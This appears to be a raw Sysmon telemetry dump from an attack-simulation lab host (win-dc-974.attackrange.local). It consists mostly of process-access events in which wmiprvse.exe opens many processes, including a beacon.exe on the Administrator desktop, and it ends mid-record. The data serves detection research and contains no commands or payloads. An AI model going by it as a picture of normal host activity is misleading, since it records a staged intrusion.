16:53:45.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239725Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239724Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239723Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002239722Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:53:45.451{05ADC7E1-6D99-603E-ABAA-00000000AD01}16164\PSHost.132591776253008120.16164.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002239721Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239720Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239719Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239718Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239717Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239716Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239715Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239714Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239713Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239712Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239711Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239710Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239709Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239708Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239707Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239706Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT